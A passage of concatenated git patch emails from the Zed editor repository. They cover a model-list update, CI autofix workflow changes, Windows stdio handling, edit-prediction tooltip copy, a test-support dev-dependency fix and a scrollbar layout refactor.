"max_output_tokens": 384000 }, { - "name": "deepseek-reasoner", - "display_name": "DeepSeek Reasoner", - "max_tokens": 64000, - "max_output_tokens": 4096 + "name": "deepseek-v4-pro", + "display_name": "DeepSeek V4 Pro", + "max_tokens": 1000000, + "max_output_tokens": 384000 } ] } From a1438cafe23065a2c4324715019b255293ec14b0 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 27 Apr 2026 16:10:03 +0200 Subject: [PATCH 061/231] ci: Fix autofix workflow (#55004) It also still does too much, but is at least faster while doing so. Release Notes: - N/A --- .github/workflows/autofix_pr.yml | 7 +++++-- tooling/xtask/src/tasks/workflows/autofix_pr.rs | 14 +++++--------- 2 files changed, 10 insertions(+), 11 deletions(-) diff --git a/.github/workflows/autofix_pr.yml b/.github/workflows/autofix_pr.yml index 4c0b4ac378c81f..5e4fe70439bc34 100644 --- a/.github/workflows/autofix_pr.yml +++ b/.github/workflows/autofix_pr.yml @@ -16,6 +16,9 @@ on: jobs: run_autofix: runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd @@ -50,13 +53,13 @@ jobs: tool: cargo-machete@0.7.0 - name: autofix_pr::run_autofix::run_cargo_fix if: ${{ inputs.run_clippy }} - run: cargo fix --workspace --release --all-targets --all-features --allow-dirty --allow-staged + run: cargo fix --workspace --allow-dirty --allow-staged - name: autofix_pr::run_autofix::run_cargo_machete_fix if: ${{ inputs.run_clippy }} run: cargo machete --fix - name: autofix_pr::run_autofix::run_clippy_fix if: ${{ inputs.run_clippy }} - run: cargo clippy --workspace --release --all-targets --all-features --fix --allow-dirty --allow-staged + run: cargo clippy --workspace --fix --allow-dirty --allow-staged - name: autofix_pr::run_autofix::run_prettier_fix run: ./script/prettier --write - name: autofix_pr::run_autofix::run_cargo_fmt diff --git a/tooling/xtask/src/tasks/workflows/autofix_pr.rs b/tooling/xtask/src/tasks/workflows/autofix_pr.rs index c2791aba0902fb..cc6563b6cb54f5 100644 --- a/tooling/xtask/src/tasks/workflows/autofix_pr.rs +++ b/tooling/xtask/src/tasks/workflows/autofix_pr.rs @@ -2,7 +2,7 @@ use gh_workflow::*; use crate::tasks::workflows::{ runners, - steps::{self, FluentBuilder, NamedJob, RepositoryTarget, TokenPermissions, named}, + steps::{self, FluentBuilder, NamedJob, RepositoryTarget, TokenPermissions, named, use_clang}, vars::{self, StepOutput, WorkflowInput}, }; @@ -69,9 +69,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo } fn run_cargo_fix() -> Step { - named::bash( - "cargo fix --workspace --release --all-targets --all-features --allow-dirty --allow-staged", - ) + named::bash("cargo fix --workspace --allow-dirty --allow-staged") } fn run_cargo_machete_fix() -> Step { @@ -79,9 +77,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo } fn run_clippy_fix() -> Step { - named::bash( - "cargo clippy --workspace --release --all-targets --all-features --fix --allow-dirty --allow-staged", - ) + named::bash("cargo clippy --workspace --fix --allow-dirty --allow-staged") } fn run_prettier_fix() -> Step { @@ -101,7 +97,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo .id("create-patch") } - named::job( + named::job(use_clang( Job::default() .runs_on(runners::LINUX_DEFAULT) .outputs([( @@ -123,7 +119,7 @@ fn run_autofix(pr_number: &WorkflowInput, run_clippy: &WorkflowInput) -> NamedJo .add_step(create_patch()) .add_step(upload_patch_artifact()) .add_step(steps::cleanup_cargo_config(runners::Platform::Linux)), - ) + )) } fn commit_changes(pr_number: &WorkflowInput, autofix_job: &NamedJob) -> NamedJob { From 56c247eae47b605518c1436437e2b21b4cb17203 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jo=C3=A3o=20Soares?= <37777652+Dnreikronos@users.noreply.github.com> Date: Mon, 27 Apr 2026 11:24:17 -0300 Subject: [PATCH 062/231] cli: Null stdio handles when spawning Zed on Windows (#52583) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #51101 Release Notes: - Fixed issue where launching Zed from Git Bash would leave the Ctrl modifier stuck in the terminal. ## Demo ### Before: https://github.com/user-attachments/assets/301c73a0-768b-437d-8a88-88d7db320c15 ### After: https://github.com/user-attachments/assets/2ec75f5e-16b9-4551-86d9-d59447712e7a --- crates/cli/src/main.rs | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/crates/cli/src/main.rs b/crates/cli/src/main.rs index 459a8266c7fc24..2b5d10b29b93e8 100644 --- a/crates/cli/src/main.rs +++ b/crates/cli/src/main.rs @@ -1101,7 +1101,7 @@ mod windows { use crate::{Detect, InstalledApp}; use std::io; use std::path::{Path, PathBuf}; - use std::process::ExitStatus; + use std::process::{ExitStatus, Stdio}; fn check_single_instance() -> bool { let mutex = unsafe { @@ -1144,6 +1144,9 @@ mod windows { if let Some(dir) = user_data_dir { cmd.arg("--user-data-dir").arg(dir); } + cmd.stdin(Stdio::null()) + .stdout(Stdio::null()) + .stderr(Stdio::null()); cmd.spawn()?; } else { unsafe { From 7dda2933918d8abc38e7f4e6935fe80c5b705dcf Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Mon, 27 Apr 2026 09:25:22 -0500 Subject: [PATCH 063/231] ep: Improve copy when showing edit predictions is disabled (#54926) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54809 Release Notes: - N/A or Added/Fixed/Improved ... --- .../src/edit_prediction_button.rs | 25 +++++++++++-------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/crates/edit_prediction_ui/src/edit_prediction_button.rs b/crates/edit_prediction_ui/src/edit_prediction_button.rs index 4d048c25a53528..f80680d4e59dd0 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_button.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_button.rs @@ -428,6 +428,13 @@ impl Render for EditPredictionButton { None }; + let zed_cloud_needs_sign_in = matches!( + provider, + EditPredictionProvider::Zed | EditPredictionProvider::Experimental(_) + ) && user.is_none(); + let provider_unavailable = + missing_token || mercury_has_error || zed_cloud_needs_sign_in; + let icon_button = IconButton::new("zed-predict-pending-button", ep_icon) .shape(IconButtonShape::Square) .when_some(indicator_color, |this, color| { @@ -435,19 +442,15 @@ impl Render for EditPredictionButton { .indicator_border_color(Some(cx.theme().colors().status_bar_background)) }) .when(!self.popover_menu_handle.is_deployed(), |element| { - let user = user.clone(); - element.tooltip(move |_window, cx| { - let description = if enabled { - if show_editor_predictions { - tooltip_meta - } else if user.is_none() { - "Sign In Or Configure a Provider" - } else { - "Hidden For This File" - } - } else { + let description = if !enabled { "Disabled For This File" + } else if zed_cloud_needs_sign_in { + "Sign In Or Configure a Provider" + } else if provider_unavailable || show_editor_predictions { + tooltip_meta + } else { + "Enable to Use" }; Tooltip::with_meta( From 5e2d7121051682d892cbd93974deeac0a60b1399 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Mon, 27 Apr 2026 17:21:03 -0400 Subject: [PATCH 064/231] gpui_macos: Enable gpui/test-support feature for tests (#54988) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit PR #51415 introduced the `PlatformHeadlessRenderer` trait and `PlatformWindow::render_to_image` method in `gpui`, both gated on `#[cfg(any(test, feature = "test-support"))]`, plus corresponding impls in `gpui_macos` (`window.rs` and `metal_renderer.rs`) gated on the same cfg. A dependent crate's `cfg(test)` flag does **not** propagate to its dependencies. So when `cargo test -p gpui_macos` is run in isolation, `gpui_macos`'s own `cfg(test)` is true (its impls get compiled) but `gpui` is just a regular dependency without `test-support` enabled (the trait and method don't exist), and the build fails: ``` error[E0405]: cannot find trait `PlatformHeadlessRenderer` in crate `gpui` error[E0407]: method `render_to_image` is not a member of trait `PlatformWindow` ``` The fix is to enable `gpui/test-support` as a dev-dependency, so the feature is on exactly when `gpui_macos`'s tests are being built. This bug is latent on `main` — workspace-level `cargo test` typically pulls in `gpui/test-support` transitively from other crates, masking it. Running `cargo test -p gpui_macos` alone is what surfaces it. Release Notes: - N/A --- crates/gpui_macos/Cargo.toml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/crates/gpui_macos/Cargo.toml b/crates/gpui_macos/Cargo.toml index 5fae110f93454b..84bde263f252f6 100644 --- a/crates/gpui_macos/Cargo.toml +++ b/crates/gpui_macos/Cargo.toml @@ -61,3 +61,13 @@ uuid.workspace = true [target.'cfg(target_os = "macos")'.build-dependencies] cbindgen = { version = "0.28.0", default-features = false } gpui.workspace = true + +# When this crate is itself being tested (cargo test -p gpui_macos), its own +# cfg(test) flag enables impls of test-only traits like PlatformHeadlessRenderer +# and PlatformWindow::render_to_image. Those traits/methods only exist in gpui +# when gpui's `test-support` feature is on, so we have to turn that feature on +# as a dev-dependency. The `cfg(test)` flag of a dependent crate doesn't +# propagate to its dependencies, but dev-dependencies do, so this is the +# correct way to enable the feature exactly when needed. +[target.'cfg(target_os = "macos")'.dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } From 862aab3fee28c5528caa8c9a646533e6cda802c0 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Tue, 28 Apr 2026 00:06:01 +0200 Subject: [PATCH 065/231] terminal_view: Ensure reported size does not change once content becomes scrollable (#46648) This fixes an issue where due to the scrollbar appearing, the reported content size would shift, causing issues in the process. We now actually always reserve space for the scrollbar appropriately as described in https://github.com/zed-industries/zed/pull/33636 initially. Release Notes: - Fixed an issue where the scrollbar could cause a layout shift in the terminal. --------- Co-authored-by: Danilo Leal --- crates/agent_ui/src/threads_archive_view.rs | 4 +- crates/editor/src/element.rs | 2 +- crates/gpui/src/elements/div.rs | 21 +- crates/gpui/src/styled.rs | 9 + crates/picker/src/picker.rs | 3 +- crates/sidebar/src/sidebar.rs | 3 +- crates/terminal_view/src/terminal_view.rs | 5 +- crates/ui/src/components/scrollbar.rs | 427 ++++++++++++-------- 8 files changed, 287 insertions(+), 187 deletions(-) diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 892c6b0c0e4fb7..8f124d7233b37c 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -1052,9 +1052,7 @@ impl Render for ThreadsArchiveView { .size_full(), ) .custom_scrollbars( - Scrollbars::new(ScrollAxes::Vertical) - .tracked_scroll_handle(&self.list_state) - .width_sm(), + Scrollbars::new(ScrollAxes::Vertical).tracked_scroll_handle(&self.list_state), window, cx, ) diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index d980984c721c86..4b719b1474d38d 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -208,7 +208,7 @@ pub enum SplitSide { } impl EditorElement { - pub(crate) const SCROLLBAR_WIDTH: Pixels = px(15.); + pub(crate) const SCROLLBAR_WIDTH: Pixels = ui::EDITOR_SCROLLBAR_WIDTH; pub fn new(editor: &Entity, style: EditorStyle) -> Self { Self { diff --git a/crates/gpui/src/elements/div.rs b/crates/gpui/src/elements/div.rs index df6403460d92c5..44a1bc4b3826b2 100644 --- a/crates/gpui/src/elements/div.rs +++ b/crates/gpui/src/elements/div.rs @@ -17,12 +17,12 @@ use crate::PinchEvent; use crate::{ - AbsoluteLength, Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent, - DispatchPhase, Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId, - Hitbox, HitboxBehavior, HitboxId, InspectorElementId, IntoElement, IsZero, KeyContext, - KeyDownEvent, KeyUpEvent, KeyboardButton, KeyboardClickEvent, LayoutId, ModifiersChangedEvent, - MouseButton, MouseClickEvent, MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, - Overflow, ParentElement, Pixels, Point, Render, ScrollWheelEvent, SharedString, Size, Style, + Action, AnyDrag, AnyElement, AnyTooltip, AnyView, App, Bounds, ClickEvent, DispatchPhase, + Display, Element, ElementId, Entity, FocusHandle, Global, GlobalElementId, Hitbox, + HitboxBehavior, HitboxId, InspectorElementId, IntoElement, IsZero, KeyContext, KeyDownEvent, + KeyUpEvent, KeyboardButton, KeyboardClickEvent, LayoutId, ModifiersChangedEvent, MouseButton, + MouseClickEvent, MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, Overflow, + ParentElement, Pixels, Point, Render, ScrollWheelEvent, SharedString, Size, Style, StyleRefinement, Styled, Task, TooltipId, Visibility, Window, WindowControlArea, point, px, size, }; @@ -1200,15 +1200,6 @@ pub trait StatefulInteractiveElement: InteractiveElement { self } - /// Set the space to be reserved for rendering the scrollbar. - /// - /// This will only affect the layout of the element when overflow for this element is set to - /// `Overflow::Scroll`. - fn scrollbar_width(mut self, width: impl Into) -> Self { - self.interactivity().base_style.scrollbar_width = Some(width.into()); - self - } - /// Track the scroll state of this element with the given handle. fn track_scroll(mut self, scroll_handle: &ScrollHandle) -> Self { self.interactivity().tracked_scroll_handle = Some(scroll_handle.clone()); diff --git a/crates/gpui/src/styled.rs b/crates/gpui/src/styled.rs index e3c79fdb405d6f..e090ba973fbb32 100644 --- a/crates/gpui/src/styled.rs +++ b/crates/gpui/src/styled.rs @@ -61,6 +61,15 @@ pub trait Styled: Sized { self } + /// Set the space to be reserved for rendering the scrollbar. + /// + /// This will only affect the layout of the element when overflow for this element is set to + /// `Overflow::Scroll`. + fn scrollbar_width(mut self, width: impl Into) -> Self { + self.style().scrollbar_width = Some(width.into()); + self + } + /// Sets the whitespace of the element to `normal`. /// [Docs](https://tailwindcss.com/docs/whitespace#normal) fn whitespace_normal(mut self) -> Self { diff --git a/crates/picker/src/picker.rs b/crates/picker/src/picker.rs index cff9da17ac9c33..f2f90db1e637ce 100644 --- a/crates/picker/src/picker.rs +++ b/crates/picker/src/picker.rs @@ -1102,8 +1102,7 @@ impl Render for Picker { .children(self.delegate.render_header(window, cx)) .child(self.render_element_container(cx)) .when(self.show_scrollbar, |this| { - let base_scrollbar_config = - Scrollbars::new(ScrollAxes::Vertical).width_sm(); + let base_scrollbar_config = Scrollbars::new(ScrollAxes::Vertical); this.map(|this| match &self.element_container { ElementContainer::List(state) => this.custom_scrollbars( diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index ebf2518d68d05f..aa07b8c3eef1be 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -5012,8 +5012,7 @@ impl Render for Sidebar { .when_some(sticky_header, |this, header| this.child(header)) .custom_scrollbars( Scrollbars::new(ScrollAxes::Vertical) - .tracked_scroll_handle(&self.list_state) - .width_sm(), + .tracked_scroll_handle(&self.list_state), window, cx, ), diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index aba0040f482ea5..36bac03312356d 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -1279,12 +1279,13 @@ impl Render for TerminalView { self.mode.clone(), )) .when(self.content_mode(window, cx).is_scrollable(), |div| { + let colors = cx.theme().colors(); div.custom_scrollbars( Scrollbars::for_settings::() .show_along(ScrollAxes::Vertical) - .with_track_along( + .with_stable_track_along( ScrollAxes::Vertical, - cx.theme().colors().editor_background, + colors.editor_background, ) .tracked_scroll_handle(&self.scroll_handle), window, diff --git a/crates/ui/src/components/scrollbar.rs b/crates/ui/src/components/scrollbar.rs index 77ceae9a34684a..3e2c8c8b9acd70 100644 --- a/crates/ui/src/components/scrollbar.rs +++ b/crates/ui/src/components/scrollbar.rs @@ -27,7 +27,9 @@ const SCROLLBAR_HIDE_DELAY_INTERVAL: Duration = Duration::from_secs(1); const SCROLLBAR_HIDE_DURATION: Duration = Duration::from_millis(400); const SCROLLBAR_SHOW_DURATION: Duration = Duration::from_millis(50); +pub const EDITOR_SCROLLBAR_WIDTH: Pixels = ScrollbarStyle::Editor.to_pixels(); const SCROLLBAR_PADDING: Pixels = px(4.); +const BORDER_WIDTH: Pixels = px(1.); pub mod scrollbars { use gpui::{App, Global}; @@ -79,6 +81,7 @@ where { let element_id = config.id.take().unwrap_or_else(|| caller_location.into()); let track_color = config.track_color; + let has_border = config.border; let state = window.use_keyed_state(element_id, cx, |_, cx| { let parent_id = cx.entity_id(); @@ -86,9 +89,9 @@ where }); state.update(cx, |state, cx| { - state - .0 - .update(cx, |state, _cx| state.update_track_color(track_color)) + state.0.update(cx, |state, _cx| { + state.update_colors(track_color, has_border) + }) }); state } @@ -318,6 +321,7 @@ enum ReservedSpace { None, Thumb, Track, + StableTrack, } impl ReservedSpace { @@ -326,24 +330,14 @@ impl ReservedSpace { } fn needs_scroll_track(&self) -> bool { - *self == ReservedSpace::Track + matches!(self, Self::Track | Self::StableTrack) } -} -#[derive(Debug, Default, Clone, Copy)] -enum ScrollbarWidth { - #[default] - Normal, - Small, - XSmall, -} - -impl ScrollbarWidth { - fn to_pixels(&self) -> Pixels { + fn needs_space_reserved(&self, max_offset: Pixels) -> bool { match self { - ScrollbarWidth::Normal => px(8.), - ScrollbarWidth::Small => px(6.), - ScrollbarWidth::XSmall => px(4.), + Self::StableTrack => true, + Self::Track => !max_offset.is_zero(), + _ => false, } } } @@ -354,6 +348,22 @@ enum Handle { Untracked(fn() -> T), } +#[derive(Clone, Copy, Default, PartialEq)] +pub enum ScrollbarStyle { + #[default] + Regular, + Editor, +} + +impl ScrollbarStyle { + pub const fn to_pixels(&self) -> Pixels { + match self { + ScrollbarStyle::Regular => px(6.), + ScrollbarStyle::Editor => px(15.), + } + } +} + #[derive(Clone)] pub struct Scrollbars { id: Option, @@ -361,8 +371,9 @@ pub struct Scrollbars { tracked_entity: Option>, scrollable_handle: Handle, visibility: Point, + style: Option, track_color: Option, - scrollbar_width: ScrollbarWidth, + border: bool, } impl Scrollbars { @@ -387,8 +398,9 @@ impl Scrollbars { scrollable_handle: Handle::Untracked(ScrollHandle::new), tracked_entity: None, visibility: show_along.apply_to(Default::default(), ReservedSpace::Thumb), + style: None, track_color: None, - scrollbar_width: ScrollbarWidth::Normal, + border: false, } } } @@ -425,10 +437,11 @@ impl Scrollbars { let Self { id, tracked_entity: tracked_entity_id, - scrollbar_width, visibility, get_visibility, track_color, + border, + style, .. } = self; @@ -437,9 +450,10 @@ impl Scrollbars { id, tracked_entity: tracked_entity_id, visibility, - scrollbar_width, track_color, + border, get_visibility, + style, } } @@ -448,19 +462,21 @@ impl Scrollbars { self } - pub fn with_track_along(mut self, along: ScrollAxes, background_color: Hsla) -> Self { - self.visibility = along.apply_to(self.visibility, ReservedSpace::Track); - self.track_color = Some(background_color); + pub fn style(mut self, style: ScrollbarStyle) -> Self { + self.style = Some(style); self } - pub fn width_sm(mut self) -> Self { - self.scrollbar_width = ScrollbarWidth::Small; + pub fn with_track_along(mut self, along: ScrollAxes, background_color: Hsla) -> Self { + self.visibility = along.apply_to(self.visibility, ReservedSpace::Track); + self.track_color = Some(background_color); self } - pub fn width_xs(mut self) -> Self { - self.scrollbar_width = ScrollbarWidth::XSmall; + pub fn with_stable_track_along(mut self, along: ScrollAxes, background_color: Hsla) -> Self { + self.visibility = along.apply_to(self.visibility, ReservedSpace::StableTrack); + self.track_color = Some(background_color); + self.border = true; self } } @@ -469,10 +485,20 @@ impl Scrollbars { enum VisibilityState { Visible, Animating { showing: bool, delta: f32 }, + ThumbHidden, Hidden, Disabled, } +enum AnimationState { + InProgress { + current_delta: f32, + animation_duration: Duration, + showing: bool, + }, + Stale, +} + const DELTA_MAX: f32 = 1.0; impl VisibilityState { @@ -499,7 +525,10 @@ impl VisibilityState { } fn is_visible(&self) -> bool { - matches!(self, Self::Visible | Self::Animating { .. }) + matches!( + self, + Self::Visible | Self::Animating { .. } | Self::ThumbHidden + ) } #[inline] @@ -507,26 +536,29 @@ impl VisibilityState { *self == VisibilityState::Disabled } - fn animation_progress(&self) -> Option<(f32, Duration, bool)> { + fn animation_state(&self) -> Option { match self { - Self::Animating { showing, delta } => Some(( - *delta, - if *showing { + Self::ThumbHidden => Some(AnimationState::Stale), + Self::Animating { showing, delta } => Some(AnimationState::InProgress { + current_delta: *delta, + animation_duration: if *showing { SCROLLBAR_SHOW_DURATION } else { SCROLLBAR_HIDE_DURATION }, - *showing, - )), + showing: *showing, + }), _ => None, } } - fn set_delta(&mut self, new_delta: f32) { + fn set_delta(&mut self, new_delta: f32, keep_track_visible: bool) { match self { - Self::Animating { showing, .. } if new_delta >= DELTA_MAX => { + Self::Animating { showing, delta } if new_delta >= DELTA_MAX => { if *showing { *self = Self::Visible; + } else if keep_track_visible { + *self = Self::ThumbHidden; } else { *self = Self::Hidden; } @@ -538,7 +570,7 @@ impl VisibilityState { fn toggle_visible(&self, show_behavior: ShowBehavior) -> Self { match self { - Self::Hidden => { + Self::Hidden | Self::ThumbHidden => { if show_behavior == ShowBehavior::Autohide { Self::for_show() } else { @@ -564,6 +596,12 @@ enum ParentHoverEvent { Outside, } +#[derive(Clone)] +struct TrackColors { + background: Hsla, + has_border: bool, +} + pub fn on_new_scrollbars(cx: &mut App) { cx.observe_new::(|_, window, cx| { if let Some(window) = window { @@ -584,12 +622,12 @@ struct ScrollbarState { notify_id: Option, manually_added: bool, scroll_handle: T, - width: ScrollbarWidth, show_behavior: ShowBehavior, get_visibility: fn(&App) -> ShowScrollbar, visibility: Point, - track_color: Option, + track_color: Option, show_state: VisibilityState, + style: ScrollbarStyle, mouse_in_parent: bool, last_prepaint_state: Option, _auto_hide_task: Option>, @@ -608,11 +646,14 @@ impl ScrollbarState { notify_id: config.tracked_entity.map(|id| id.unwrap_or(parent_id)), manually_added, scroll_handle, - width: config.scrollbar_width, visibility: config.visibility, - track_color: config.track_color, + track_color: config.track_color.map(|color| TrackColors { + background: color, + has_border: config.border, + }), show_behavior, get_visibility: config.get_visibility, + style: config.style.unwrap_or_default(), show_state: VisibilityState::from_behavior(show_behavior), mouse_in_parent: true, last_prepaint_state: None, @@ -690,18 +731,15 @@ impl ScrollbarState { fn space_to_reserve_for(&self, axis: ScrollbarAxis) -> Option { (self.show_state.is_disabled().not() - && self.visibility.along(axis).needs_scroll_track() && self - .scroll_handle() - .max_offset() + .visibility .along(axis) - .is_zero() - .not()) + .needs_space_reserved(self.scroll_handle().max_offset().along(axis))) .then(|| self.space_to_reserve()) } fn space_to_reserve(&self) -> Pixels { - self.width.to_pixels() + 2 * SCROLLBAR_PADDING + self.style.to_pixels() + 2 * SCROLLBAR_PADDING } fn handle_to_track(&self) -> Option<&Handle> { @@ -783,8 +821,11 @@ impl ScrollbarState { } } - fn update_track_color(&mut self, track_color: Option) { - self.track_color = track_color; + fn update_colors(&mut self, track_color: Option, has_border: bool) { + self.track_color = track_color.map(|color| TrackColors { + background: color, + has_border, + }); } fn parent_hovered(&self, window: &Window) -> bool { @@ -975,7 +1016,7 @@ struct ScrollbarLayout { track_bounds: Bounds, cursor_hitbox: Hitbox, reserved_space: ReservedSpace, - track_background: Option<(Bounds, Hsla)>, + track_config: Option<(Bounds, TrackColors)>, axis: ScrollbarAxis, } @@ -1100,93 +1141,110 @@ impl Element for ScrollbarElement { window: &mut Window, cx: &mut App, ) -> Self::PrepaintState { - let prepaint_state = self - .state - .read(cx) - .disabled() - .not() - .then(|| ScrollbarPrepaintState { - thumbs: { - let state = self.state.read(cx); - let thumb_ranges = state.thumb_ranges().collect::>(); - let width = state.width.to_pixels(); - let track_color = state.track_color; - - let additional_padding = if thumb_ranges.len() == 2 { - width - } else { - Pixels::ZERO - }; + let prepaint_state = + self.state + .read(cx) + .disabled() + .not() + .then(|| ScrollbarPrepaintState { + thumbs: { + let state = self.state.read(cx); + let thumb_ranges = state.thumb_ranges().collect::>(); + let width = state.style.to_pixels(); + let track_color = state.track_color.as_ref(); + + let additional_padding = if thumb_ranges.len() == 2 { + width + } else { + Pixels::ZERO + }; - thumb_ranges - .into_iter() - .map(|(axis, thumb_range, reserved_space)| { - let track_anchor = match axis { - ScrollbarAxis::Horizontal => Anchor::BottomLeft, - ScrollbarAxis::Vertical => Anchor::TopRight, - }; - let Bounds { origin, size } = Bounds::from_anchor_and_size( - track_anchor, - bounds - .corner(track_anchor) - .apply_along(axis.invert(), |corner| { - corner - SCROLLBAR_PADDING + thumb_ranges + .into_iter() + .map(|(axis, thumb_range, reserved_space)| { + let track_anchor = match axis { + ScrollbarAxis::Horizontal => Anchor::BottomLeft, + ScrollbarAxis::Vertical => Anchor::TopRight, + }; + + let scroll_track_bounds = Bounds::from_anchor_and_size( + track_anchor, + self.origin + bounds.corner(track_anchor), + bounds.size.apply_along(axis.invert(), |_| { + width + + match state.style { + ScrollbarStyle::Regular => 2 * SCROLLBAR_PADDING, + ScrollbarStyle::Editor => Pixels::ZERO, + } }), - bounds.size.apply_along(axis.invert(), |_| width), - ); - let scroll_track_bounds = Bounds::new(self.origin + origin, size); + ); - let padded_bounds = scroll_track_bounds.extend(match axis { - ScrollbarAxis::Horizontal => Edges { - right: -SCROLLBAR_PADDING, - left: -SCROLLBAR_PADDING, - ..Default::default() - }, - ScrollbarAxis::Vertical => Edges { - top: -SCROLLBAR_PADDING, - bottom: -SCROLLBAR_PADDING, - ..Default::default() - }, - }); - - let available_space = - padded_bounds.size.along(axis) - additional_padding; - - let thumb_offset = thumb_range.start * available_space; - let thumb_end = thumb_range.end * available_space; - let thumb_bounds = Bounds::new( - padded_bounds - .origin - .apply_along(axis, |origin| origin + thumb_offset), - padded_bounds - .size - .apply_along(axis, |_| thumb_end - thumb_offset), - ); + let has_border = + track_color.is_some_and(|track_colors| track_colors.has_border); - let needs_scroll_track = reserved_space.needs_scroll_track(); - - ScrollbarLayout { - thumb_bounds, - track_bounds: padded_bounds, - axis, - cursor_hitbox: window.insert_hitbox( - if needs_scroll_track { - padded_bounds - } else { - thumb_bounds - }, - HitboxBehavior::BlockMouseExceptScroll, - ), - track_background: track_color - .filter(|_| needs_scroll_track) - .map(|color| (padded_bounds.dilate(SCROLLBAR_PADDING), color)), - reserved_space, - } - }) - .collect() - }, - parent_bounds_hitbox: window.insert_hitbox(bounds, HitboxBehavior::Normal), - }); + // Rounded style needs a bit of padding, whereas for editor scrollbars, + // we want the full length of the track + let thumb_container_bounds = match state.style { + ScrollbarStyle::Regular => { + scroll_track_bounds.dilate(-SCROLLBAR_PADDING) + } + ScrollbarStyle::Editor if has_border => scroll_track_bounds + .extend(match axis { + ScrollbarAxis::Horizontal => Edges { + top: -BORDER_WIDTH, + ..Default::default() + }, + + ScrollbarAxis::Vertical => Edges { + left: -BORDER_WIDTH, + ..Default::default() + }, + }), + ScrollbarStyle::Editor => scroll_track_bounds, + }; + + let available_space = + thumb_container_bounds.size.along(axis) - additional_padding; + + let thumb_offset = thumb_range.start * available_space; + let thumb_end = thumb_range.end * available_space; + let thumb_bounds = Bounds::new( + thumb_container_bounds + .origin + .apply_along(axis, |origin| origin + thumb_offset), + thumb_container_bounds + .size + .apply_along(axis, |_| thumb_end - thumb_offset), + ); + + let needs_scroll_track = reserved_space.needs_scroll_track(); + + ScrollbarLayout { + thumb_bounds, + track_bounds: thumb_container_bounds, + axis, + cursor_hitbox: window.insert_hitbox( + if needs_scroll_track { + if has_border && state.style == ScrollbarStyle::Editor { + scroll_track_bounds + } else { + thumb_container_bounds + } + } else { + thumb_bounds + }, + HitboxBehavior::BlockMouseExceptScroll, + ), + track_config: track_color + .filter(|_| needs_scroll_track) + .map(|color| (scroll_track_bounds, color.clone())), + reserved_space, + } + }) + .collect() + }, + parent_bounds_hitbox: window.insert_hitbox(bounds, HitboxBehavior::Normal), + }); if prepaint_state .as_ref() .is_some_and(|state| Some(state) != self.state.read(cx).last_prepaint_state.as_ref()) @@ -1196,27 +1254,41 @@ impl Element for ScrollbarElement { } prepaint_state.map(|state| { - let autohide_delta = self.state.read(cx).show_state.animation_progress().map( - |(delta, delta_duration, should_invert)| { - window.with_element_state(id.unwrap(), |state, window| { + let autohide_delta = self + .state + .read(cx) + .show_state + .animation_state() + .map(|state| match state { + AnimationState::InProgress { + current_delta, + animation_duration: delta_duration, + showing: should_invert, + } => window.with_element_state(id.unwrap(), |state, window| { let state = state.unwrap_or_else(|| Instant::now()); let current = Instant::now(); - let new_delta = DELTA_MAX - .min(delta + (current - state).div_duration_f32(delta_duration)); - self.state - .update(cx, |state, _| state.show_state.set_delta(new_delta)); + let new_delta = DELTA_MAX.min( + current_delta + (current - state).div_duration_f32(delta_duration), + ); + self.state.update(cx, |state, _| { + let has_border = state + .track_color + .as_ref() + .is_some_and(|track_colors| track_colors.has_border); + state.show_state.set_delta(new_delta, has_border) + }); window.request_animation_frame(); let delta = if should_invert { - DELTA_MAX - delta + DELTA_MAX - current_delta } else { - delta + current_delta }; (ease_in_out(delta), current) - }) - }, - ); + }), + AnimationState::Stale => 1.0, + }); (state, autohide_delta) }) @@ -1243,7 +1315,9 @@ impl Element for ScrollbarElement { let capture_phase; if self.state.read(cx).visible() { - let thumb_state = &self.state.read(cx).thumb_state; + let state = self.state.read(cx); + let thumb_state = &state.thumb_state; + let style = state.style; if thumb_state.is_dragging() { capture_phase = DispatchPhase::Capture; 